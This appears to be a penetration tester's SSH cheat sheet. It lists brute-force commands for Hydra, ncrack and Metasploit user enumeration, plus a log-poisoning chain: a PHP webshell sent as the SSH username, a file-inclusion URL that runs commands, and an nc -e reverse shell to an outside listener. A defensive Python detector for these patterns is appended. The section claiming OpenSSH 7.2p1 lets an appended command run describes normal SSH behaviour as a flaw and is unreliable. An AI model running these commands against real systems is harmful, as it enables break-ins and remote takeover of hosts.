SSH 22

SSH Enumeration and assorted commands

#Checklist

Check for SSH version vulns
Check for user enumeration
Check if the host key was seen somewhere else
Check if it prompts for a password (means password login is allowed for at least some users)
nmap -sV --script=ssh-hostkey -p22 10.10.10.10
Brute-force if necessary with CeWL (for wordlists), Hydra, Patator or Crowbar

#Sysadmin shit

Check ssh status >>>> sudo service ssh status

Start ssh server >>>> sudo service ssh start

Stop ssh server >>>> sudo service ssh stop

Restart ssh server >>>> sudo service ssh restart

netstat -tulpn | grep sshd >>>> (check whether sshd is running and on which ports)

#If you find private keys:

sudo chmod 600 key (not 777; ssh refuses a private key with loose permissions)
ssh -i key -p 22 user@10.10.10.10    # port goes after -p, a trailing 22 would be run as a remote command

#Generate private keys

ssh-keygen -t rsa

#Banner Grabbing

nc -vn 192.168.101.158 22

#NMAP SSH scripts

ls -lh /usr/share/nmap/scripts/ssh*   # the SSH scripts are files named ssh-*.nse, not a directory
sudo nmap 10.11.1.71 -p 22 -sV --script=ssh-hostkey   # hostkey script

#ssh-keyscan

ssh-keyscan -t rsa -p 22 192.168.101.158

#Hydra bruteforcing

sudo hydra -l admin -P rockyou.txt -v 192.168.101.133 ssh -s 22 -t 4

Good password list:

/usr/share/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt

#NCRACK

If push comes to shove, use ncrack to brute-force:

ncrack -p 22 --user root -P ./passwords.txt 10.5.23.0/24

#Metasploit scanner

Metasploit user enumeration (useful for building a username list for later cracking)

use auxiliary/scanner/ssh/ssh_enumusers
set RHOSTS 10.10.10.10
set RPORT 22
set USER_FILE usernames.txt
set THREADS 1
set THRESHOLD 5
run

#SSH Log poisoning

Presupposes both an open SSH port and a file-inclusion vuln in the web app that can read the log (that is what turns it into RCE).

1) On kali: log in so the payload lands in the target's auth.log (payload goes in the username, see RCE via SSH below)

ssh ''@10.10.10.10    # 10.10.10.10 = target IP

2) Target URL: include the log and pass the command

http://10.10.10.10/search.php?id=/var/log/auth.log&cmd=ls -la

#Revshell

http://10.10.10.10/search.php?id=/var/log/auth.log&cmd=nc -e /bin/bash 192.168.101.95 1234

#Escaping Rbash

sudo ssh user@192.168.101.173 -t "bash --noprofile"

#RCE via SSH

Try to ssh into the box with PHP code as the username (quote it, otherwise the shell treats < ; ? > as redirections and globs):

ssh '<?php system($_GET["cmd"]);?>@10.10.10.10'

Then include the SSH log file inside the web application (see SSH Log poisoning above).
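Added here as a defender-side counterpart to the Hydra/ncrack and log-poisoning sections above; this is not part of the original notes. It reads OpenSSH auth.log lines (a constructed sample is embedded), flags password-failure bursts from one source IP, and flags "Invalid user" names that cannot be a real login, such as the PHP tag above. The syslog line format, the year, the thresholds and the "plausible login name" pattern are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log lines (not from the page): a Hydra-style burst from
# one source, a poisoning attempt sending a PHP tag as the username, one real login.
SAMPLE_LOG = """\
Mar 10 12:00:01 web sshd[2101]: Failed password for invalid user admin from 192.168.101.133 port 51234 ssh2
Mar 10 12:00:02 web sshd[2102]: Failed password for invalid user admin from 192.168.101.133 port 51235 ssh2
Mar 10 12:00:02 web sshd[2103]: Failed password for root from 192.168.101.133 port 51236 ssh2
Mar 10 12:00:03 web sshd[2104]: Failed password for root from 192.168.101.133 port 51238 ssh2
Mar 10 12:05:00 web sshd[2150]: Invalid user <?php system($_GET["cmd"]);?> from 10.10.10.10 port 4444
Mar 10 12:06:10 web sshd[2160]: Accepted publickey for deploy from 10.0.0.5 port 40000 ssh2
"""

FAILED_RE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
                       r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")
INVALID_RE = re.compile(r"sshd\[\d+\]: Invalid user (.*?) from (\S+) port \d+")
SANE_USER_RE = re.compile(r"^[a-z_][a-z0-9_.-]{0,31}\$?$")  # plausible login name (assumed)

def parse_ts(stamp, year=2024):
    # syslog stamps carry no year, so one is assumed for the sample
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")

def detect_bruteforce(log, threshold=4, window_s=60):
    """{src_ip: total_failures} for sources with >= threshold failed
    passwords inside some window_s-second span (Hydra/ncrack pattern)."""
    by_src = defaultdict(list)
    for line in log.splitlines():
        m = FAILED_RE.match(line)
        if m:
            by_src[m.group(3)].append(parse_ts(m.group(1)))
    hits = {}
    for src, times in by_src.items():
        times.sort()
        for i in range(len(times)):
            j = i  # slide a window that starts at times[i]
            while j < len(times) and (times[j] - times[i]).total_seconds() <= window_s:
                j += 1
            if j - i >= threshold:
                hits[src] = len(times)
                break
    return hits

def detect_log_poisoning(log):
    """[(src_ip, username)] for 'Invalid user' entries whose name cannot be a
    real login, e.g. a PHP tag planted for a later include of the log."""
    return [(m.group(2), m.group(1)) for m in map(INVALID_RE.search, log.splitlines())
            if m and not SANE_USER_RE.match(m.group(1))]
```

Run it against a real /var/log/auth.log by passing the file contents instead of SAMPLE_LOG; the same two checks are what a fail2ban jail or a SIEM rule would key on.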

#Vulnerable versions: 7.2p1 | append a command and get execution

ssh -v user@10.10.1.111 id

Password:
debug1: Authentication succeeded (keyboard-interactive).
Authenticated to 10.10.1.111 ([10.10.1.1114]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: Sending command: id
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0
uid=1000(user) gid=100(users) groups=100(users)
debug1: channel 0: free: client-session, nchannels 1
Transferred: sent 2412, received 2480 bytes, in 0.1 seconds

#Force Auth method

ssh -v 10.10.1.111 -o PreferredAuthentications=password

#Linux with OpenSSH < 7.7 (username enumeration script)

Usage --> python ssh-username-enum.py 10.10.10.10 -w usernames.txt
